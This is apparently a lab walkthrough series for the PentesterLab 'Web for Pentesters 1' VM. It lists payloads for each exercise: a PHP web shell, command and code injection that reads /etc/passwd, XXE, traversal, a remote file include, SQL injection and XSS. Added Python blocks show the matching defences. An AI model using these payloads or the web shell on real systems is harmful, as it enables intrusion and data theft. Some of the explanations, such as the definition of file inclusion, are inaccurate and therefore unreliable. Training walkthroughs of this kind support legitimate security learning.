Web for pentesters 1, LDAP, File upload and XML attacks.

In this post I'll be walking through the Web for Pentesters 1 LDAP, file upload and XML attack exercises. These are the last of the exercises for the virtual machine and will conclude this series.

First off, what is LDAP? LDAP (Lightweight Directory Access Protocol) is a protocol for accessing and maintaining a directory service over an IP network. It lets a user query and modify the directory remotely, as if they were working on that machine directly.

LDAP Answers:
Example 1:
For the first example, just remove everything in the URL from php? onwards and you should be authenticated.

Example 2:
For example 2 you need to comment out the rest of the query so that the server accepts any password you pass it.

The URL you end up with should look something like this:
example2.php?name=hacker)(cn=*))%00&password=fake

%00 is the URL-encoded null byte; it terminates the string so that anything after it in the query is ignored.
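The fix on the server side, as an added example that is not part of the original post or the PentesterLab code: escape every user-supplied value before it is placed in the LDAP filter (RFC 4515 encodes `(`, `)`, `*`, `\` and NUL as a backslash plus two hex digits). The filter shape `(&(cn=...)(userPassword=...))` is an assumption; the VM's exact filter is not shown on the page.

```python
# Added example, not the exercise's code: escaping a value before it is placed
# in an LDAP search filter (RFC 4515). Each metacharacter becomes a backslash
# plus the two hex digits of its byte, so "(", ")", "*", "\" and NUL coming
# from user input can no longer change the filter's structure.

LDAP_FILTER_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Escape one assertion value for use inside an LDAP filter."""
    return "".join(LDAP_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username: str, password: str) -> str:
    """Plain concatenation, the pattern behind example 2: ")(cn=*))" in the
    name closes the cn clause early and the trailing NUL cuts off the rest."""
    return f"(&(cn={username})(userPassword={password}))"


def build_login_filter(username: str, password: str) -> str:
    """Same filter shape (assumed, not taken from the VM) with both values
    escaped, so the injected parentheses are literal characters."""
    return (
        f"(&(cn={escape_filter_value(username)})"
        f"(userPassword={escape_filter_value(password)}))"
    )


def parens_balanced(ldap_filter: str) -> bool:
    """Cheap structural sanity check: an injected ")(cn=*))" leaves the
    concatenated filter with a closing parenthesis that has no opener."""
    depth = 0
    for ch in ldap_filter:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


if __name__ == "__main__":
    # Constructed input: the example 2 payload, URL-decoded.
    name, password = "hacker)(cn=*))\x00", "fake"
    print("unsafe :", build_login_filter_unsafe(name, password).replace("\x00", "<NUL>"))
    print("escaped:", build_login_filter(name, password))
```

The balance check is a detection aid, not a substitute for escaping: a filter that is still well-formed can be malicious, while an escaped value can never alter the structure at all.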

File Upload:

The code we will use in the file that will be uploaded is the following:
<?php
    system($_GET["cmd"]);
?>

Copy that into a .php file.
example 1:
Upload the PHP file with the code above; once uploaded, follow the link provided by the VM.
On that page you should get an error saying the system cannot execute a blank command.
All you now have to do is append ?cmd=cat /etc/passwd to the URL to output the passwd file contents on the page.
example 2:
For this example, create a new file with the code above and the extension .php.blah (swap blah for anything else; just make sure it is not an extension the server processes).
Upload the file, click the link and you should get the same error you got in example 1. Now append ?cmd=cat /etc/passwd to the URL and the passwd file should be displayed.
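Example 2 works because the upload check only looks at the last extension, while the web server is willing to treat `.php` anywhere in the name as a handler. The validator below is an added example, not the exercise's code or PentesterLab's; the allowed and executable extension sets are an assumed policy.

```python
# Added example, not the exercise's code: deciding whether an uploaded filename
# may be stored. The weak check only looks at the final extension, which is
# what lets "shell.php.blah" through in example 2. The strict check inspects
# every suffix, rejects null bytes, and then throws the client's name away.
import re
import secrets

ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}          # assumed policy
EXECUTABLE_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}


def naive_is_allowed(filename: str) -> bool:
    """Weak check: only the end of the name is inspected."""
    return not filename.lower().endswith(".php")


def all_suffixes(filename: str) -> list:
    """Every dot-separated suffix of the basename, lower-cased:
    'shell.php.blah' -> ['.php', '.blah']. Directory parts are ignored."""
    base = re.split(r"[\\/]", filename)[-1]
    parts = base.split(".")
    return ["." + p.lower() for p in parts[1:] if p]


def strict_is_allowed(filename: str) -> bool:
    """Reject NUL, reject any executable suffix anywhere in the name, and
    require the final suffix to be on the allowlist."""
    if "\x00" in filename:
        return False
    suffixes = all_suffixes(filename)
    if not suffixes:
        return False
    if any(s in EXECUTABLE_EXTENSIONS for s in suffixes):
        return False
    return suffixes[-1] in ALLOWED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Server-chosen random name; only the vetted extension survives, so the
    client cannot influence the name the web server sees on disk."""
    if not strict_is_allowed(filename):
        raise ValueError(f"rejected upload name: {filename!r}")
    return secrets.token_hex(16) + all_suffixes(filename)[-1]


if __name__ == "__main__":
    # Constructed names covering examples 1 and 2 above plus a benign upload.
    for name in ["shell.php", "shell.php.blah", "holiday.jpg"]:
        print(f"{name:16} naive={naive_is_allowed(name)!s:5} strict={strict_is_allowed(name)}")
```

Renaming on the server matters as much as the check: even with a perfect allowlist, letting the client pick the stored name hands them control over how the web server interprets it.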
XML attack:
Example 1:
Here all you have to do is type the payload provided by PentesterLab into the URL with a null byte (%00) at the end and the exploit should work.
<%21DOCTYPE%20test%20%5b<%21ENTITY%20hacker%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%5d><test>%26hacker%3b<%2ftest>%0a%0a
Example 2: 
If you follow what is on PentesterLab, the exploit should work and give you the password pentesterlab.
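Both XML examples depend on the parser honouring a DTD supplied by the client. The check below is an added example, not the exercise's code: it refuses any document that carries a DOCTYPE before the real parse happens, using only Python's standard library (in production, the defusedxml package provides the same protection). The sample document is the decoded form of the example 1 payload.

```python
# Added example, not the exercise's code: parsing untrusted XML while refusing
# any document that declares a DOCTYPE. The example 1 payload declares an
# external entity in an internal DTD subset and references it in the body;
# with no DTD allowed there is nothing for "&hacker;" to expand to.
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    pass


def reject_doctype(document: bytes) -> None:
    """Run expat over the bytes and raise as soon as a <!DOCTYPE appears.
    Exceptions raised inside an expat handler propagate out of Parse()."""
    parser = expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeForbidden(f"DOCTYPE {name!r} not allowed in untrusted XML")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(document, True)


def parse_untrusted(document: bytes) -> ET.Element:
    """Pre-check, then the ordinary parse. A document that slips an undefined
    entity in without a DTD fails here with a normal ParseError."""
    reject_doctype(document)
    return ET.fromstring(document)


def is_safe_to_parse(document: bytes) -> bool:
    """Boolean form of the check for logging or tests."""
    try:
        reject_doctype(document)
    except (DoctypeForbidden, expat.ExpatError):
        return False
    return True


# Constructed samples: the URL-decoded example 1 payload and a benign document.
XXE_SAMPLE = (
    b'<!DOCTYPE test [<!ENTITY hacker SYSTEM "file:///etc/passwd">]>'
    b"<test>&hacker;</test>"
)
BENIGN_SAMPLE = b"<test>hello</test>"

if __name__ == "__main__":
    for doc in (XXE_SAMPLE, BENIGN_SAMPLE):
        print(doc[:40], "->", "safe" if is_safe_to_parse(doc) else "rejected")
```

Rejecting the DOCTYPE outright is simpler and more robust than trying to allow "harmless" internal entities while blocking SYSTEM ones; an application that needs to accept untrusted XML almost never needs the client to define a DTD.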

Web for Pentesters 1- Code injection and Command Injection

In this section I'll go through the code and command injection exercises. While code injection and command injection are very similar, they differ in execution. In code injection, you deliver the code as part of the data you pass into the web app, e.g. in the username field or a comment section, and the application evaluates it. In command injection, the web app expects a certain value to be passed to a system command, but another command is inserted along with it.

Code Injection

example 1:

name=hacker".system(%27uname%20-a%27);//
                OR
name=hacker".system(%27uname%20-a%27);#
The comment sequence comments out the rest of the code, which lets you escape the eval() string and execute the uname -a command on the server, returning the server's system information.

example 2:

example2.php?order=id);}system(%27uname%20-a%27);//
Here we close the PHP function strcmp() with the ) and close the user-created function with the }.
After that, we inject our system() call, which executes the uname -a command like before, and then comment out the rest of the code.

example 3:

example3.php?new=hacker&pattern=/lamer/e&base=Hello%20lamer
Place the e modifier between the closing / and &base to produce the error.
Basically this error means the server is trying to execute the value 'hacker' as PHP code (the /e modifier makes preg_replace() evaluate the replacement), but it can't, as no such function or constant exists.
So now we can run any PHP expression just by replacing the value hacker with the code we want, like so:
example3.php?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
Displays the phpinfo page.
example3.php?new=system(%27uname%20-a%27)&pattern=/lamer/e&base=Hello%20lamer
This runs the uname -a command on the system and returns the system name.

example 4:

Adding ' or " to the end of hacker produces the error.
PHP's assert() function evaluates the string it is given as PHP code and checks whether the result is false.
example4.php?name=hacker%27.phpinfo().%27
This escapes the assert() string and executes phpinfo(), displaying its output on the web page.
Next up is command injection.

Command Injection

example 1:

example1.php?ip=127.0.0.1%26%26cat%20/etc/passwd
Basically there's no validation or encoding here, so inserting %26%26cat /etc/passwd outputs the passwd file to the web page.
%26%26 = && (URL encoding)

example 2:

example2.php?ip=127.0.0.1%0acat%20/etc/passwd
Here you can bypass the validation by passing a URL-encoded newline followed by a new command.
\n (newline) = %0a

example 3:

Using the telnet command, I was able to get it to work.
telnet <vm's ip> 80
Then send the request:
GET /commandexec/example3.php?ip=127.0.0.1|uname+-a HTTP/1.0
This should display the system name between pre tags, towards the bottom of the output.
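All three command injection examples are the same "ping this IP" feature with a different separator slipping past a filter. The rebuild below is an added example, not the exercise's PHP: it validates the parameter as an IP address and runs the command as an argument vector with no shell, so `&&`, `%0a` and `|` are never interpreted. The three payloads replayed through it are the ones from this section.

```python
# Added example, not the exercise's PHP: the "ping this IP" function behind
# the three command-injection examples, rebuilt so that "&&", a newline and
# "|" cannot reach a shell. Layer one: the parameter must parse as an IP
# address. Layer two: the command runs as an argument vector, shell=False.
import ipaddress
import subprocess
from urllib.parse import unquote_plus


def validate_ip(raw: str) -> str:
    """Return the canonical address or raise ValueError. ipaddress accepts
    only a bare IPv4/IPv6 literal, so any appended text fails the parse."""
    return str(ipaddress.ip_address(raw))


def build_ping_argv(raw: str) -> list:
    """Argument vector for ping; the address is one argv element."""
    return ["ping", "-c", "1", validate_ip(raw)]


def run_ping(raw: str) -> str:
    # No shell is involved: even if validation were skipped, metacharacters
    # would be handed to ping inside a single argument, not treated as
    # command separators by /bin/sh.
    result = subprocess.run(
        build_ping_argv(raw), capture_output=True, text=True, timeout=10
    )
    return result.stdout


def classify(query_value: str) -> str:
    """URL-decode a query-string value as the web server would, then report
    whether validate_ip accepts it."""
    decoded = unquote_plus(query_value)
    try:
        return "accepted " + validate_ip(decoded)
    except ValueError:
        return "rejected"


# Constructed inputs: the three payloads from the examples above plus the
# benign case, exactly as they would appear in the query string.
PAYLOADS = [
    "127.0.0.1",
    "127.0.0.1%26%26cat%20/etc/passwd",
    "127.0.0.1%0acat%20/etc/passwd",
    "127.0.0.1|uname+-a",
]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p:40} -> {classify(p)}")
```

Decoding before validating matters: the newline in example 2 only exists after `%0a` is decoded, which is why a filter applied to the raw query string can pass something the shell later sees quite differently.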

Web for pentesters 1- directory traversal and file include

Continuing with the series of Web for Pentesters 1 walk-throughs, this post focuses on the directory traversal and file include exercises in the ISO. Let's start with what these attacks are and how they can be prevented. First off, what is a directory traversal attack? In basic terms, it allows someone to view files outside of the web application's directory, e.g. the shadow file of the web server. You can prevent this by validating user input and the URLs sent to the server.

File inclusion is uploading a file to the server in a file type that wasn't intended, like uploading a bash script disguised as a text file. This type of exploit can lead to attacks like cross-site scripting. You can prevent this by validating the files uploaded by the user (a running theme with a lot of exploits).
As usual, PentesterLab has a very good explanation of these exploits in the course section for this ISO. So without further delay, here are some sample answers:
Directory Traversal:
example 1:
wget -O - 'http://<vmip>/dirtrav/example1.php?file=../../../../../../../etc/passwd' > e1.txt
Outputs the contents into the file e1.txt.
You could also put the link directly into the browser and have it display the passwd file.
example 2:
wget -O - 'http://<vmip>/dirtrav/example2.php?file=/var/www/file/../../../etc/passwd' > e2.txt
Outputs the contents into the file e2.txt.
example 3:
example3.php?file=../../../../../../../etc/passwd
File Include:
Use this link from PentesterLab to test for file inclusion:
https://pentesterlab.com/test_include.txt
example 1:
fileincl/example1.php?page=https://pentesterlab.com/test_include.txt
This will display the PHP info page.
example 2:
http://172.16.224.130/fileincl/example2.php?page=https://pentesterlab.com/test_include.txt
Append a URL-encoded null byte (%00) to the end of the string and it will display the PHP info page.
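The traversal and include exercises share one root cause: a request parameter chooses which file the server opens. The code below is an added example, not the exercise's or PentesterLab's: it confines a `file` parameter to one directory (serving the dirtrav examples) and turns the `page` parameter into a lookup key (serving the fileincl examples). The document root and the page allowlist are assumed values, and the path logic is pure string arithmetic so it runs without a filesystem.

```python
# Added example, not the exercise's code: confining a user-supplied "file"
# parameter to one directory and replacing an open-ended "page" parameter
# with an allowlist. posixpath arithmetic only; on a real server, apply
# os.path.realpath to resolve symlinks before the containment test.
import posixpath
from urllib.parse import unquote

FILES_ROOT = "/var/www/files"                          # assumed, not from the VM
PAGES = {"home": "home.php", "about": "about.php"}     # assumed allowlist


def safe_path(root: str, user_value: str) -> str:
    """Return root/user_value normalised, or raise ValueError if it escapes.
    `root` is given without a trailing slash."""
    decoded = unquote(user_value)
    if "\x00" in decoded:
        raise ValueError("null byte in path")
    if decoded.startswith("/"):
        raise ValueError("absolute path not allowed")
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Containment: equal to root or strictly below it. The trailing slash
    # matters, otherwise "/var/www/files-old" would pass as a prefix.
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes the document directory")
    return candidate


def check_file_param(user_value: str) -> str:
    """String result for replaying the payloads: resolved path or reason."""
    try:
        return safe_path(FILES_ROOT, user_value)
    except ValueError as exc:
        return f"rejected: {exc}"


def resolve_page(page_param: str) -> str:
    """The page parameter selects a key; it is never a path or a URL, so
    "page=https://.../test_include.txt" cannot name anything to include."""
    try:
        return PAGES[page_param]
    except KeyError:
        raise ValueError("unknown page") from None


def check_page_param(page_param: str) -> str:
    try:
        return resolve_page(page_param)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    # Constructed replay of the payloads from this section plus benign values.
    for value in ["report.txt", "../../../../../../../etc/passwd",
                  "/var/www/file/../../../etc/passwd", "report.txt%00.php"]:
        print(f"file={value:40} -> {check_file_param(value)}")
    for page in ["home", "https://pentesterlab.com/test_include.txt"]:
        print(f"page={page:40} -> {check_page_param(page)}")
```

Normalising first and checking the prefix afterwards is the order that matters: a `../` filter applied to the raw value misses encoded and doubled forms, whereas a check on the final resolved path does not care how the traversal was spelled.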

Web for Pentesters- SQL Injection

Part 2 of the Web for Pentesters walk-through. In this part, we'll go through what SQL injection is and how to exploit it in the PentesterLab virtual machine. In basic terms, SQL injection is injecting SQL commands into an application so that it outputs something the developer didn't intend. This happens because the developer does not sanitise the user's input properly. For this section it is really helpful to have a URL encoder; there are plenty online, or build your own.

The following are some sample answers for the SQL injection section of the VM. If you need an explanation of how these exploits work, the PentesterLab course explains each one perfectly:

example 1:
?name=root' or '1'='1' %23
# = %23 (URL encoding)

example 2:
?name=root'%09or%09'1'='1
\t (tab) = %09 (URL encoding)

example 3:
?name=root'/**/or/**/'1'='1

example 4:
?id=2/**/or/**/1=1

example 5:
?id=2%20or%201=1

example 6:
?id=2%20or%201=1

example 7:
?id=2%0A or 1=1
%0A = newline character (URL encoding)

example 8:
Do what is said in the walkthrough; there is no real payload, as everything is showing already.

example 9:
?order=IF(0,name,age)
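Every payload in this section exploits the same thing: the parameter is pasted into the SQL text. The code below is an added example, not the exercise's code, showing the string lookups (examples 1-3), the numeric lookups (examples 4-7) and the ORDER BY case (example 9) once with string formatting and once the safe way, against a constructed in-memory SQLite table. The `#` comment from example 1 is MySQL syntax that SQLite does not accept, so the tab and `/**/` variants are the ones replayed.

```python
# Added example, not the exercise's code: string formatting versus bound
# parameters (and an allowlist for ORDER BY, since identifiers cannot be
# bound), run against a constructed SQLite table so the effect is visible.
import sqlite3
from urllib.parse import unquote

USERS = [(1, "root", 40), (2, "admin", 35), (3, "hacker", 22)]   # constructed data
ORDERABLE_COLUMNS = {"id", "name", "age"}


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def names(rows) -> list:
    return [row[0] for row in rows]


def by_name_unsafe(conn, name: str) -> list:
    """Vulnerable: the value is spliced into the SQL text, so a quote in the
    input ends the string and the rest is parsed as SQL."""
    return names(conn.execute(f"SELECT name FROM users WHERE name='{name}'"))


def by_name_safe(conn, name: str) -> list:
    """Bound parameter: the value is data and is never parsed as SQL."""
    return names(conn.execute("SELECT name FROM users WHERE name=?", (name,)))


def by_id_unsafe(conn, raw_id: str) -> list:
    """Vulnerable numeric form: no quotes to escape, "2 or 1=1" is enough."""
    return names(conn.execute(f"SELECT name FROM users WHERE id={raw_id}"))


def by_id_safe(conn, raw_id: str) -> list:
    """Convert first (int() raises on "2 or 1=1"), then bind."""
    return names(conn.execute("SELECT name FROM users WHERE id=?", (int(raw_id),)))


def ordered_safe(conn, column: str) -> list:
    """ORDER BY takes an allowlisted column name; anything else, including
    the IF(0,name,age) expression from example 9, is refused."""
    if column not in ORDERABLE_COLUMNS:
        raise ValueError("unknown sort column")
    return names(conn.execute(f"SELECT name FROM users ORDER BY {column}"))


if __name__ == "__main__":
    conn = make_db()
    payload = unquote("root'%09or%09'1'='1")      # example 2, URL-decoded
    print("unsafe:", by_name_unsafe(conn, payload))
    print("safe  :", by_name_safe(conn, payload))
    print("id    :", by_id_unsafe(conn, "2 or 1=1"))
```

The `/**/` and tab variants exist only to dodge a space filter; neither filter helps once the query uses bound parameters, because the database never tokenises the value at all.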

Web for pentesters 1 Cross-Site Scripting (XSS)

This first series of posts will focus on Web for Pentester 1 by PentesterLab. A walk-through is provided on the site, which I recommend going through before looking at the answers I provide.
Here are some sample answers for the cross-site scripting section of the virtual machine. If you require some explanation as to what cross-site scripting is and how it works, there is a section in the walk-through accompanying this virtual machine on PentesterLab, and also a nice explanation by Daniel Miessler.
If you're running some sort of ad-blocker or script-blocker, you may need to disable it for the answers to work.
example 1:
<script>alert(1)</script>
This causes an alert box to pop up.
example 2:
<SCript>alert(1)</Script>
This will cause an alert box to pop up.
example 3:
<Scr<Script>ipt>alert(1)</Sc</Script>ript>
This will cause an alert box to pop up.
example 4:
<a onmousemove="alert(1)"/>
Once you move the mouse over the web page, an alert box will pop up.
example 5:
<script>eval(String.fromCharCode(097,108,101,114,116))(1)</script>
This converts the ASCII codes into the string alert, which will cause an alert box to pop up.
example 6:
1";alert(1)//
Again, another alert box will be displayed.
example 7:
1';alert(1)//
Alert box will be displayed.
example 8:
In the address bar, type:
/"><SCRIPT>alert(String.fromCharCode(49))</SCRIPT>
String.fromCharCode(49) converts 49 into the character 1. As in example 5, you can also replace the 49 with a string of ASCII codes.
example 9:
After the # symbol in the URL, type:
<script>alert(1)</script>
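Examples 1-5 above inject into HTML text or an attribute, while examples 6-8 inject into a JavaScript string; the defence is output encoding chosen for the context the value lands in. The encoders below are an added example, not the exercise's code; the template in `render_page` is constructed for illustration.

```python
# Added example, not the exercise's code: encoding a value for the context it
# is written into. HTML text and attributes use HTML entity escaping; a value
# placed inside a <script> string needs a JavaScript string literal with the
# HTML-significant characters hex-escaped. The two are not interchangeable.
import html
import json


def for_html_text(value: str) -> str:
    """Element text: <, >, &, " and ' become entities."""
    return html.escape(value, quote=True)


def for_html_attribute(value: str) -> str:
    """Attribute value: same escaping, and always emitted in double quotes so
    a space in the value cannot start a new attribute (example 4's trick)."""
    return '"' + html.escape(value, quote=True) + '"'


def for_js_string(value: str) -> str:
    """JavaScript string literal. json.dumps escapes quotes and backslashes
    (examples 6 and 7); <, > and & are then hex-escaped so the literal can
    never contain "</script>" and close the enclosing script element."""
    literal = json.dumps(value)
    return (
        literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")
    )


def render_page(name: str) -> str:
    """Constructed template placing one untrusted value in all three contexts."""
    return (
        f"<p>Hello {for_html_text(name)}</p>\n"
        f"<a title={for_html_attribute(name)}>link</a>\n"
        f"<script>var name = {for_js_string(name)};</script>"
    )


if __name__ == "__main__":
    # Constructed inputs: payloads from examples 1, 4 and 6 above.
    for payload in ['<script>alert(1)</script>', '" onmousemove="alert(1)', '1";alert(1)//']:
        print(render_page(payload))
        print("---")
```

The mistake behind most XSS findings is applying one encoder everywhere: HTML-escaping a value that is then written inside a JavaScript string leaves the `"` from example 6 intact for the JS parser, while JSON-encoding a value that is written into HTML text leaves `<script>` intact for the HTML parser.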